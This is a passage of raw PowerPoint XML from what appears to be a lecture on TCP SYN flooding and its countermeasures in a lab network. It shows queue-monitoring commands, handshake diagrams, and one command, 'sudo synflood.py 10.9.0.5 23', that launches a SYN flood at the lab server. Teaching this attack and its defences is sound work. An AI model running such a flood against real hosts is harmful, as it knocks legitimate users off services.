                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYN_RECV | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066515" y="4616666"/>
            <a:ext cx="5879320" cy="479430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066515" y="2795679"/>
            <a:ext cx="5794375" cy="1417259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211044" y="2137978"/>
            <a:ext cx="3203072" cy="326909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9320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6" end="1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208203"/>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If experiment fails (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>legal user still can login after server is attacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>),…</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t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130274" y="1000669"/>
            <a:ext cx="8962925" cy="3393237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server  (on 10.9.0.5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp_metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   //cache for recent telnet clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server reserve a space in SYN queue for returning clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Attackers can not flood the reserved space.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp_metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          //clear cache       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="920587" y="2121380"/>
            <a:ext cx="4327525" cy="390960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174808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7005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SYN Flooding Attack – using Python program</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164460" y="710160"/>
            <a:ext cx="6177134" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Replace c program with the python program:    </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> synflood.py 10.9.0.5 23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586834" y="1608827"/>
            <a:ext cx="4879748" cy="3405360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223585" y="3493140"/>
            <a:ext cx="5499557" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>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392917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Countermeasure:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerability from SYN queue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013076" y="2473485"/>
            <a:ext cx="1901163" cy="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81468" y="2126759"/>
            <a:ext cx="1138066" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053645" y="3342932"/>
            <a:ext cx="1901163" cy="657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9185" y="3030194"/>
            <a:ext cx="2215828" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=y, ACK=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5104852" y="1559085"/>
            <a:ext cx="3644443" cy="1420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3368152" y="2040405"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092707" y="1844159"/>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sIP4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784533" y="1832099"/>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sIP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7463203" y="1833200"/>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sIP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135313" y="1821147"/>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sIP1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
